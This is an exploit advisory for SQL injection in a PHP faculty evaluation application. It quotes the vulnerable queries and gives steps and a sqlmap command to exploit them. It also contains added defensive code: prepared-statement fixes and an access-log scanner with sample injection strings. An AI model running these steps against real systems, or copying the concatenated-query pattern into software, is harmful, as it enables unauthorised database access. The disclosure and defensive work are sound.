# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: Windows Server 2022
SQLi #1
File: edit_evaluation
Line #4
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]
SQLi #2
File: view_faculty.php
Line #4
// Append an "id" parameter after the "view_faculty" parameter and give it an integer value
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]
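Both queries build SQL by concatenating the raw $_GET['id'] string, so any non-numeric value reaches MySQL unchanged. The following is an added example, not code from the advisory or from the vendor's project: it rewrites the two queries with integer validation and mysqli prepared statements. Table and column names are taken from the advisory's query strings; $conn is assumed to be the application's existing mysqli connection, and the function names are my own.

```php
<?php
// Added example (not from the advisory or the vendor's code): the two vulnerable
// queries rewritten with input validation and mysqli prepared statements.
// Assumes $conn is the application's mysqli connection; table and column names
// come from the advisory's query strings.

declare(strict_types=1);

// Reject anything that is not a plain positive integer before it reaches SQL.
function validate_id(array $params): ?int
{
    if (!isset($params['id'])) {
        return null;
    }
    $id = filter_var($params['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened replacement for the edit_evaluation query: the id is bound as an
// integer parameter, so the query text never contains user-controlled characters.
function fetch_rating(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare('SELECT * FROM ratings WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Hardened replacement for the view_faculty.php query.
function fetch_faculty(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare(
        "SELECT *, CONCAT(firstname, ' ', lastname) AS name FROM faculty_list WHERE id = ?"
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Constructed inputs that exercise the validator without a database.
$samples = [
    ['id' => '1'],          // accepted: 1
    ['id' => '1 OR 1=1'],   // rejected
    ['id' => "1'"],         // rejected
    ['id' => '-5'],         // rejected (min_range)
    ['id' => ['1']],        // rejected (array, e.g. id[]=1)
    [],                     // rejected (missing)
];
foreach ($samples as $s) {
    $id = validate_id($s);
    printf("%-14s => %s\n", var_export($s['id'] ?? null, true),
        $id === null ? 'rejected' : "accepted ($id)");
}

// Usage in the page handler (runs only where $conn exists):
// $id = validate_id($_GET);
// if ($id === null) { http_response_code(400); exit('invalid id'); }
// $qry = fetch_faculty($conn, $id);
```

The validation step is defence in depth: the prepared statement alone already prevents the injection, but rejecting non-integer ids up front also gives the application a clean 400 response to log and alert on instead of a database error.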
Steps to Exploit:
1. Log in to the application
2. Browse to the following URI: "http://host/eval/index.php?page=view_faculty&id=1"
3. Save the request from the intercepting proxy to a file
4. Exploit using SQLMap
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint
[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >=5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
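The sqlmap run above leaves a distinctive trail in the web server's access log: requests to the vulnerable pages whose "id" parameter is no longer a bare integer, and (by default) sqlmap's own User-Agent string. As an added example that is not part of the advisory, the following PHP script shows how a defender could scan a combined-format access log for those two indicators. The log lines are constructed for the example, the field layout is assumed to be Apache/nginx "combined" format, and the function names are my own.

```php
<?php
// Added example (not from the advisory or the vendor's code): a small access-log
// check for requests that hit the two vulnerable pages with a non-integer "id",
// or that carry sqlmap's default User-Agent. Sample lines below are constructed;
// the Apache/nginx "combined" log layout is an assumption.

declare(strict_types=1);

const VULNERABLE_PAGES = ['view_faculty', 'edit_evaluation'];

// Parse one combined-format line into the fields we need; null if it does not match.
function parse_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'uri' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

// Reasons a request looks like an injection attempt; an empty array means clean.
function suspicious_reasons(array $req): array
{
    $reasons = [];
    $query = parse_url($req['uri'], PHP_URL_QUERY);
    $params = [];
    parse_str(is_string($query) ? $query : '', $params);   // URL-decodes values

    $page = $params['page'] ?? '';
    if (in_array($page, VULNERABLE_PAGES, true) && array_key_exists('id', $params)) {
        $id = $params['id'];
        // Legitimate use is a bare positive integer; anything else is worth a look.
        if (!is_string($id) || !preg_match('/^[1-9]\d*$/', $id)) {
            $reasons[] = "non-integer id on page=$page: " . json_encode($id);
        }
    }
    if (stripos($req['ua'], 'sqlmap') !== false) {
        $reasons[] = 'sqlmap User-Agent';
    }
    return $reasons;
}

// Constructed sample lines: one benign request, one automated probe, one manual attempt.
$log = <<<'LOG'
203.0.113.10 - - [10/Jul/2023:10:00:01 +0000] "GET /eval/index.php?page=view_faculty&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Jul/2023:10:00:05 +0000] "GET /eval/index.php?page=view_faculty&id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.11 - - [10/Jul/2023:10:02:30 +0000] "GET /eval/index.php?page=edit_evaluation&id=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
LOG;

foreach (explode("\n", $log) as $line) {
    $req = parse_line($line);
    if ($req === null) {
        continue;
    }
    foreach (suspicious_reasons($req) as $why) {
        printf("%s %s %s -> %s\n", $req['time'], $req['ip'], $req['uri'], $why);
    }
}
```

Running it prints nothing for the first line and one alert per reason for the other two. The User-Agent check is the weaker signal, since it is trivially changed; the non-integer id check mirrors the validation the application itself should perform, so it keeps working regardless of the tool used.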